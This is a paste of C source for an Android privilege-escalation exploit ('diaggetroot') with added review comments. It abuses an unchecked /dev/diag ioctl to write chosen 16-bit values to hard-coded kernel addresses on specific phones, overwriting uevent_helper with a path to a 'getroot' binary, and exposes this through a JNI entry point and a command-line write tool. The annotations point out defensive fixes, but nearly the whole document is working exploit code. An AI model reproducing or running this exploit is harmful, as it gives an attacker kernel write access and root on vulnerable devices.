goroh_kun

diagwritevalue source code

Jan 15th, 2013
  1. ################## jni.c ###########################
  2. #include <stdio.h>
  3. #include <stdint.h>
  4. #include <stdlib.h>
  5. #include <unistd.h>
  6. #include <jni.h>
  7. #include <sys/mman.h>
  8.  
  9. #define  LOG_TAG    "diaggetroot"
  10. #define  LOGI(...)  __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
  11. #define  LOGD(...)  __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
  12. #define  LOGE(...)  __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
  13.  
  14. #include <android/log.h>
  15.  
  /* One pending 16-bit store: where to write and what to write. */
  struct values {
      unsigned addr;          /* target address; set to _buf + offset in uevent_helper_mod */
      unsigned short value;   /* 16-bit value to store; also the sort key used by cmpare */
  };
  20.  
  21. extern void b(void* adr, int value, int fd);
  22.  
  /*
   * qsort() comparator for struct values entries.
   * Orders by the 16-bit `value` field, ascending; `addr` is ignored.
   * Returns -1, 0 or 1.
   */
  int cmpare(const void *a, const void *b)
  {
      const struct values *lhs = a;
      const struct values *rhs = b;

      /* (l > r) - (l < r) evaluates to 1, 0 or -1 without branching. */
      return (lhs->value > rhs->value) - (lhs->value < rhs->value);
  }
  34.  
  /*
   * Splits the path string below into 16-bit values and passes each one to b()
   * together with a target address counted up from the hard-coded constant _buf.
   *
   * fd is forwarded unchanged to b().
   *
   * NOTE(review): _buf is a fixed, device-specific address (the author labels the
   * active value "is03" and the commented-out one as the HTC Butterfly
   * uevent_helper buffer). The code depends on the kernel storing through a
   * caller-supplied pointer. Defensive takeaways: the driver behind b() must
   * validate user pointers, and the diag device node should not be reachable by
   * untrusted apps. On a suspect device, an unexpected value in
   * /sys/kernel/uevent_helper is presumably a useful indicator; confirm that the
   * kernel build exposes it.
   * NOTE(review): strlen() is used, but <string.h> is not among the includes
   * shown for this file.
   */
  static void uevent_helper_mod(int fd)
  {
  //    unsigned _buf = 0xc0d0dfd0; //HTC Butterfly uevent_helper_buffer
      unsigned _buf = 0xC0643D20; //is03
      const char* path="/data/local/tmp/getroot\0";
      struct values datas[400];
      int i, j;
      j=0;
      /* Two characters per entry, low byte first. When the string length is odd,
         the high byte of the last entry is the explicit "\0" in the literal. */
      for(i=0; i<strlen(path); i+=2){
        datas[j].addr = _buf+ i;
        datas[j].value = path[i] | (path[i+1] << 8);
        j++;
      }
      /* Sort ascending by value (see cmpare), so the stores below are issued in
         value order, not address order. */
      qsort( datas, j, sizeof(struct values), cmpare);
      for(i=0; i<j; i++){
          LOGD("data[%d] addr=%x value=%x", i, datas[i].addr, datas[i].value);
          b((void*)datas[i].addr, datas[i].value, fd);
      }
  }
  54.  
  /*
   * Stores a 32-bit value as two 16-bit halves through b(): the low half at
   * `address`, the high half at `address + 2`.
   *
   * fd is forwarded unchanged to b().
   *
   * NOTE(review): `address` is cast straight to a pointer with no range check,
   * and the cast assumes that `unsigned` is as wide as a pointer (32-bit target).
   * `(void*)address+2` relies on arithmetic on void*, which is a GNU extension.
   */
  static void write_value(int fd, unsigned address, unsigned value)
  {
  //    b((void*)0xc0da86d0, 0xa924, fd);
  //    b((void*)0xc0da86d2, 0xc034, fd);
  printf("write_value(0x%x, 0x%x)\n", address, value);
      b((void*)address, value & 0xffff, fd);              /* low 16 bits */
      b((void*)address+2, (value >> 16) & 0xffff, fd);    /* high 16 bits */
  }
  63.  
  /*
   * JNI entry point for com.example.diaggetroot.MainActivity.getrootnative.
   * Forwards the descriptor supplied by the Java side to uevent_helper_mod().
   * env and thiz are not used.
   */
  void
  Java_com_example_diaggetroot_MainActivity_getrootnative( JNIEnv* env,
                                                    jobject thiz, int fd)
  {
      uevent_helper_mod(fd);
  }
  70.  
  71. extern unsigned p_delayed_rsp_id;
  72.  
  /*
   * Command-line front end: parses `address` and `value` (and an optional third
   * argument that overrides p_delayed_rsp_id), then calls write_value() with
   * fd 0, which makes b() open the device itself.
   *
   * Always returns 0.
   *
   * NOTE(review): the usage guard tests argc < 2, but argv[2] is read
   * unconditionally. With exactly one argument, argv[2] is NULL and passing it
   * to strtoll() is undefined behaviour; the guard should be argc < 3.
   * NOTE(review): endptr is never inspected, so malformed numbers are accepted
   * silently. The strtoll() results are narrowed to unsigned long here and to
   * unsigned in write_value() without a range check.
   */
  int main(int argc, char** argv)
  {
      unsigned long address = 0;
      unsigned long value = 0;
      char *endptr;
      if(argc < 2) {
          printf("%s address value\n", argv[0]);
          return 0;
      }
      /* Base 0: accepts decimal, 0x-prefixed hex and 0-prefixed octal. */
      address = strtoll(argv[1], &endptr, 0);
      value = strtoll(argv[2], &endptr, 0);
      if(argc > 3){
          p_delayed_rsp_id = strtoll(argv[3], &endptr, 0);
      }
      write_value(0, address, value);
  //    uevent_helper_mod(0);
      return 0;
  }
  91.  
  92. ################## diag.c ###########################
  93. #include <stdio.h>
  94. #include <unistd.h>
  95. #include <errno.h>
  96. #include <signal.h>
  97. #include <stdlib.h>
  98. #include <dlfcn.h>
  99. #include <elf.h>
  100. #include <sys/system_properties.h>
  101. #include <fcntl.h>
  102. #include <stdarg.h>
  103.  
  104. #define  LOG_TAG    "diaggetroot"
  105. #define  LOGI(...)  __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
  106. #define  LOGD(...)  __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
  107. #define  LOGE(...)  __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
  108.  
  109. #include <android/log.h>
  110.  
  111. #define DIAG_IOCTL_GET_DELAYED_RSP_ID   8
  /*
   * Argument block passed to ioctl(DIAG_IOCTL_GET_DELAYED_RSP_ID) in b2.
   * NOTE(review): presumably mirrors the driver's own structure of the same
   * name; confirm against the driver header.
   */
  struct diagpkt_delay_params{
      void *rsp_ptr;          /* pointer handed to the driver; b2 points it at a local or at the target address */
      int size;               /* always set to 2 in b2 */
      int *num_bytes_ptr;     /* second pointer handed to the driver; b2 points it at a local or at p_delayed_rsp_id */
  };
  117.  
  /* Hard-coded, device-specific address that b2 passes as num_bytes_ptr in its
     first ioctl (labelled "SH02E" there). main() in jni.c overwrites it from
     argv[3] when that argument is given. */
  unsigned p_delayed_rsp_id = 0xc0da86ec;
  119.  
  /*
   * Issues DIAG_IOCTL_GET_DELAYED_RSP_ID on fd with caller-chosen pointers in
   * struct diagpkt_delay_params, ending with a run of calls whose rsp_ptr is adr.
   *
   * adr   - address given to the driver as rsp_ptr in the final loop
   * value - only (value - ptr) & 0xffff is used, as the loop count
   * fd    - open descriptor for the diag device
   *
   * NOTE(review): this depends on the driver storing through rsp_ptr and
   * num_bytes_ptr without checking that they are user-space addresses. That is
   * presumably a direct dereference where copy_to_user()/put_user() belongs;
   * confirm against the driver source. Validating the pointers in the driver is
   * the fix, and restricting access to the device node limits exposure.
   * NOTE(review): the loop count is masked to 16 bits, so one call can issue up
   * to 65535 identical ioctls in a tight loop. A burst like that from an app
   * process is a detectable pattern.
   * NOTE(review): ret is assigned but never checked. uint16_t and ioctl() are
   * used although <stdint.h> and <sys/ioctl.h> are not among this file's
   * includes.
   */
  static void b2(void* adr, int value, int fd)
  {
    uint16_t ptr;
    int i;
    int num;
    int ret;
    struct diagpkt_delay_params p;

    /* First call: rsp_ptr is a local, but num_bytes_ptr is the hard-coded
       address held in p_delayed_rsp_id, not a local variable. */
    ptr = 0;
    p.rsp_ptr = &ptr;
    p.size = 2;
    p.num_bytes_ptr = (void*)p_delayed_rsp_id; // SH02E
  //  p.num_bytes_ptr = (void*)0xC06485A8; // IS03
  //  p.num_bytes_ptr = (void*)0xc0ba8394; // HTC butterfly

    ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);

    /* Second call with ordinary local pointers; ptr receives whatever the driver
       stores through rsp_ptr (presumably its current 16-bit id; confirm). */
    ptr = 0;
    p.rsp_ptr = &ptr;
    p.size = 2;
    num = 0;
    p.num_bytes_ptr = &num;

    ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);

    /* Distance from the value just read to the requested one, modulo 2^16. */
    ptr = (value - ptr) & 0xffff;
    LOGD("loop = %x\n", ptr);
    printf("loop = %x\n", ptr);

    /* Repeat the same ioctl that many times with rsp_ptr = adr. */
    for(i=0; i< ptr; i++) {
      num = 0;
      p.rsp_ptr = adr;
      p.size = 2;
      p.num_bytes_ptr = &num;
      ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
    }
  }
  157.  
  /*
   * Public wrapper around b2(): resolves the descriptor to use, then delegates.
   *
   * adr, value - passed through to b2() unchanged
   * fd         - descriptor for the diag device; 0 means "open /dev/diag here"
   *
   * When fd is 0, the device is opened once and the descriptor is cached in the
   * function-local static fd2 for later calls. When the resulting descriptor is
   * negative, the error is logged and nothing else happens.
   *
   * NOTE(review): 0 doubles as the "not supplied / not yet opened" sentinel, so
   * a real descriptor 0 cannot be passed in. A failed open() leaves fd2 at -1,
   * which is never retried. The cached descriptor is never closed.
   * NOTE(review): being able to open /dev/diag read-write from an unprivileged
   * process is the precondition for everything b2() does. Device-node
   * permissions and SELinux policy are the places to check on a device under
   * review.
   */
  void b(void* adr, int value, int fd)
  {
    static int fd2;
  //  printf("delayed_rsp_id = 0x%x\n", p_delayed_rsp_id);
    if(fd == 0){
      if(fd2 == 0){
        fd2 = open("/dev/diag", O_RDWR);
      }
      fd = fd2;
    }
    if(fd < 0) {
      LOGE("fd=%d", fd);
      return;
    }
    b2(adr, value, fd);
  }